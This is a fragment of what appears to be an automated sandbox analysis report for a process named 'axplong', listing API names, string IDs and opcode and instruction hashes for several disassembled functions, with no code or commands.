                      • Instruction ID: 861ead3fb1773b6362d66c7230cd6bd4e6a862631c22bf1e4c679508366d5bac
                      • Opcode Fuzzy Hash: 00f09f157acb21c240d65a6ced475cf1da23301fb865fb82383aa373c97c4c31
                      • Instruction Fuzzy Hash: 0902D171A00248EFEF14EFA8C949BDEBBB5FF05304F604558E815A7282D7759A84CFA1
                      APIs
                      Strings
                      Yara matches
                      Similarity
                      • API ID: _wcsrchr
                      • String ID: .bat$.cmd$.com$.exe
                      • API String ID: 1752292252-4019086052
                      • Opcode ID: f190141fab10e215728b85e991191a8999fbcb0024b7856a6f5472c392137bea
                      • Instruction ID: 15b8034fc00991ce00897939bd24c05a5799eca99d983457034cb0ee3a3c27fd
                      • Opcode Fuzzy Hash: f190141fab10e215728b85e991191a8999fbcb0024b7856a6f5472c392137bea
                      • Instruction Fuzzy Hash: 6301D63761871626662865199D02B7F1BDCAB83BB472A012FF944FB3C3EF45DC0282A0
                      APIs
                      Yara matches
                      Similarity
                      • API ID: Mtx_unlock$Cnd_broadcast
                      • String ID:
                      • API String ID: 32384418-0
                      • Opcode ID: 443c1d47020f61ace54bdfd94f96f7a19d7ab32ace992780c2d7a26a2e30894c
                      • Instruction ID: 4ae3085dc1efed3d6f7a2ef5fae90f3940bb6090ff4701d77a4930bc8c37e8e1
                      • Opcode Fuzzy Hash: 443c1d47020f61ace54bdfd94f96f7a19d7ab32ace992780c2d7a26a2e30894c
                      • Instruction Fuzzy Hash: 5AA1B0B1A01205AFDF11EB64CD44BAAB7B8FF15324F44C639E819D7241EB35EA14CBA1
                      APIs
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction ID: a1ca0ab840beaf949341eac9f0c7e4e53b3bc324f0acffb39d8ae7e8ef48064f
                      • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction Fuzzy Hash: 17B127329042859FEB11CF28C8417BEBBF5EF56360F1481AAE455EB382D7399D41CB60
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Xtime_diff_to_millis2_xtime_get
                      • String ID:
                      • API String ID: 531285432-0
                      • Opcode ID: 368d28a39cad6a5d47d68fa228ee111492e8b5162450a31c49439047131c8461
                      • Instruction ID: 5d860cff547baab91becded3cdc0bb8aa73ba445b12da3f169f052e7afa90289
                      • Opcode Fuzzy Hash: 368d28a39cad6a5d47d68fa228ee111492e8b5162450a31c49439047131c8461
                      • Instruction Fuzzy Hash: E7212F71A012199FDF14FFA4DD45DAEBBB8EF48724F100065F601A7251DB34AD018FA1